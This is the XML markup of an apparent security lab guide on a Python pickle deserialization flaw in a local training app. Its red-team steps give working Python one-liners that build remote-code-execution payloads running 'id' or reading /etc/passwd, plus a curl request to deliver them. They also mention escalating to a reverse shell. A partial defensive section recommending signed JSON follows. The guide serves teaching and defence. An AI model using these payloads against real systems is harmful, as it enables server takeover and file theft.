        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Export a legitimate session to understand the format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to Session Manager → click "Export My Session →"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response includes session_data: a base64-encoded pickle of your session dict.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Copy this — it shows the legitimate format and confirms pickle is being used.</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Understand how pickle RCE works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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pickle.loads() deserializes Python objects — including arbitrary class instances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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A class with __reduce__ returning (os.system, ("cmd",)) executes the command on load.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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We create a malicious pickle payload, base64-encode it, and send it to import.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># How malicious pickle works:
import pickle, os
class Exploit:
    def __reduce__(self):
        # This tuple tells pickle: call os.system("id") on load
        return (os.system, ("id",))
# Serialise and encode:
malicious = pickle.dumps(Exploit())
print(base64.b64encode(malicious).decode())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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Generate the RCE pickle payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Run this Python one-liner on your attacking machine to generate the payload:</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># One-liner to generate RCE pickle payload:
python3 -c "
import pickle, base64, os
print(base64.b64encode(
  pickle.dumps(
    type('X',(),{'__reduce__':lambda s:(__import__('os').system,('id',))})()
  )
).decode())
"
# Copy the output — paste it as session_data
# For reading files:
python3 -c "
import pickle, base64, os
payload = type('X',(),{'__reduce__':lambda s:(
  __import__('os').popen,('cat /etc/passwd',))})()
print(base64.b64encode(pickle.dumps(payload)).decode())
"</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Send payload to /api/session/import and confirm RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Paste your base64 payload into the "Base64 Pickle Data" textarea.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "Import →"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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The server executes the command during deserialization!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response shows: {"success":true,"type":"int",...} — the os.system return code (0 = success).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Escalate: replace "id" with "cat secret.txt" or a reverse shell command.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Full exploitation via curl:
curl -X POST http://localhost:7007/api/session/import \
  -H "Content-Type: application/json" \
  -b "ncx_token=YOUR_JWT" \
  -d '{"session_data":"PASTE_YOUR_B64_PAYLOAD_HERE"}'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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Generate pickle payload that executes "id" or "cat /etc/passwd". Server executes command during import. Response confirms execution via return code. Escalate to reading secret.txt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Replace pickle with signed JSON — never deserialize untrusted data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The root fix: never deserialize user-supplied data with pickle (or Java ObjectInputStream, PHP unserialize, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Use JSON for data interchange — it cannot execute code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
